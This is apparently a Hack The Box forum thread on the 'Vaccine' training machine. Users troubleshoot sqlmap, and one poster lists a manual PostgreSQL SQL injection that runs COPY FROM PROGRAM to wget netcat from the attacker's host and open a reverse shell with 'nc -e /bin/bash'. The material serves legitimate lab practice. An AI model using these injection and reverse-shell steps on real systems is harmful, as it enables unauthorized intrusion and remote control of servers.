Machine name: vaccine stuck on getting SQL code execution shell

Getting through this box is going to need some stubborn determination I think. If anything its a good thing that its not working becuase its going to force us to think for ourselves and self learn what we don’t know. There will be another way in I am sure.

I’m not using MSF, I’m trying to use it sparingly as I don’t believe MSF is a very good tool for learning. I’m trying a manual exploit but I keep getting timeouts on port 80 which makes that kind of hard.

Hello,

If you want to do it by hand you can follow this link:

And if someone prefers, I coded a python script available here:

good luck

Hello,
I have the same issue: time out when using the --os-shell option with sqlmap.
Doing it manually (with florianges’s python script) does not seem to solve the issue.

Same here with sqlmap and manually or with @florianges script, which is also not working and seems to fail after the last command: “ERROR: program “/tmp/XXXXX/nc 10.10.14.XX 4444 -e /bin/bash” failed DETAIL: command not found”

Type your comment> @florianges said:

Hello,

If you want to do it by hand you can follow this link:
Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest | by Greenwolf | Greenwolf Security | Medium

And if someone prefers, I coded a python script available here:
GitHub - florianges/-HTB-Vaccine_sql_injection

good luck

Thanks for this really appreciate the assistance! I finally managed to root this box!

Hello,
@SIFGU and @OS41380

Did you open the script and read the comments and meet all of the requirements listed?
Have you watched the youtube presentation video?

Type your comment> @Pyroteq said:

Type your comment> @0ne-nine9 said:

Hello everyone,

For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.

Thank you.

I’ve been stuck on this for days now because people keep on crashing the server. Literally as soon is a reset vote is done someone almost IMMEDIATELY screws it up again… Very frustrating, especially as this is supposed to be a beginner box.

Does VIP access include VIP access to the starting servers or only the servers past this point? At this stage I’m willing to just throw money at the issue so I can move on.

Hiya,

Yes VIP includes a separate server for starting-point VIP. However, there’s no assurance that VIP members will not create instability on the box, as the number of VIP servers for starting-point is smaller than that of main machines.

Maybe try tackling the machine at a different time of day.

Thanks!

I guess the box is still stuck, I voted to reset the lab.

I really struggled on this one with the same issues, gave up on sqlmap and used @florianges ’ Python script. Struggled to understand the nc parameter I was meant to set. Couldn’t get it working at first but in the end I literally followed his video step by step, copied the bin file (cp /bin/nc .) into the same location as the web server and then it worked. I was just taking an nc.exe file and copying it into the location and then setting the parameter to nc.exe but that was wrong.

@florianges this script is awesome - worked perfectly for me! Thanks so much!

Type your comment> @florianges said:

Hello,
@SIFGU and @OS41380

Did you open the script and read the comments and meet all of the requirements listed?
Have you watched the youtube presentation video?

https://www.youtube.com/watch?v=2k7IirmLlxs

I do that,
but nothing showing with “nc”

Type your comment> @ma24th said:

I do that,
but nothing showing with “nc”

I think the web server is down now. It was loading fine earlier but it won’t load in the browser now either…

We need 2 more votes to reset the lab in US VIP if you want to join…

hi guys need help with this machine… when i run the sqlmap with the right cookie it is giving me a 302 redirect to index.php

anyone know how to get pass this?

sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a’ --cookie=“PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8”
[21:43:28] [INFO] testing connection to the target URL
got a 302 redirect to ‘http://10.10.10.46:80/index.php’. Do you want to follow? [Y/n] n
[21:43:29] [INFO] testing if the target URL content is stable
[21:43:29] [WARNING] GET parameter ‘search’ does not appear to be dynamic
[21:43:30] [WARNING] heuristic (basic) test shows that GET parameter ‘search’ might not be injectable
[21:43:30] [INFO] testing for SQL injection on GET parameter ‘search’
[21:43:30] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause’
[21:43:30] [INFO] testing ‘Boolean-based blind - Parameter replace (original value)’
[21:43:30] [INFO] testing ‘MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[21:43:31] [INFO] testing ‘PostgreSQL AND error-based - WHERE or HAVING clause’
[21:43:31] [INFO] testing ‘Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)’
[21:43:32] [INFO] testing ‘Oracle AND error-based - WHERE or HAVING clause (XMLType)’
[21:43:32] [INFO] testing ‘MySQL >= 5.0 error-based - Parameter replace (FLOOR)’
[21:43:32] [INFO] testing ‘Generic inline queries’
[21:43:32] [INFO] testing ‘PostgreSQL > 8.1 stacked queries (comment)’
[21:43:32] [INFO] testing ‘Microsoft SQL Server/Sybase stacked queries (comment)’
[21:43:33] [INFO] testing ‘Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)’
[21:43:33] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’
[21:43:34] [INFO] testing ‘PostgreSQL > 8.1 AND time-based blind’
[21:43:34] [INFO] testing ‘Microsoft SQL Server/Sybase time-based blind (IF)’
[21:43:34] [INFO] testing ‘Oracle AND time-based blind’

Hi,

It looks like a few people had questions about how to manually perform the sql injection. Using Florianges methodology, I was able to get it working manually. Here is what i did:

Assumptions: you are logged into the website using admin creds.

  1. Stand up a simple websever on port 80
    [sudo python3 -m http.server 80]
  2. In the case of the server above, my server makes my desktop the root directory. So i made sure i had a copy of netcat on my desktop (i put it in a folder called bin for funsies)
  3. open up netcat on port 4444 (or whatever port)
    [nc -lvnp 4444]
  4. Following Florianges (respect given for code) methodology, i pasted the following lines into my browser window to take advantage of the sql injection vulnerability:
    [http://10.10.10.46/dashboard.php?search=a’;DROP TABLE IF EXISTS cmd_27440; – -]
    [http://10.10.10.46/dashboard.php?search=a’;CREATE TABLE cmd_27440(cmd_output text); – -]
    [http://10.10.10.46/dashboard.php?search=a’;COPY cmd_27440 FROM PROGRAM ‘wget -P /tmp/27440 http://10.10.14.XX:80/bin/nc’; – -]
    [http://10.10.10.46/dashboard.php?search=a’;COPY cmd_27440 FROM PROGRAM ‘chmod 777 /tmp/27440/nc’; – -]
    [http://10.10.10.46/dashboard.php?search=a’;COPY cmd_27440 FROM PROGRAM ‘/tmp/27440/nc 10.10.14.XX 4444 -e /bin/bash’; – -]
    note1: the XX’s on some ip addresses represent my ip address.
  5. Check netcat - you should have a terminal. Do a test command like whoami if you’d like.
    — fin —

note2: the number 27440 is a random number. i’d recommend changing it when you execute.

This challenge was a little trickier due to sqlmap not working but i enjoyed learning how to do a manual sql injection. If anyone is able to help me understand why sqlmap isnt working, i’d be interested to know.

Cheers,
bii

Type your comment> @deeptestpilot said:

hi guys need help with this machine… when i run the sqlmap with the right cookie it is giving me a 302 redirect to index.php

anyone know how to get pass this?

sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a’ --cookie=“PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8”
[21:43:28] [INFO] testing connection to the target URL
got a 302 redirect to ‘http://10.10.10.46:80/index.php’. Do you want to follow? [Y/n] n
[21:43:29] [INFO] testing if the target URL content is stable

You have error in command. It is PHPSESSID=3dr3h62vjq0tn58mu5o1oep0e8. You copied from web browser with “:” and used PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8

I understand the vulnerability, thanks to the link posted by @florianges. I can also read and understand the python script. How did you learn about dashboard.php?

Hi! i guess, accessing the server was not an issue and sql injection was not mandatory to gain OS access, I simply used the ftpuser password from last lab filezilla config and it to login to the server and gain access to postgresql user. But now i’m stuck with the privilege escalation…!

Type your comment> @henriqscx said:

I understand the vulnerability, thanks to the link posted by @florianges. I can also read and understand the python script. How did you learn about dashboard.php?

bruteforce the website. use either dirbuster, dirsearch, gobuster with a wordlist of known files/directories and it will pop up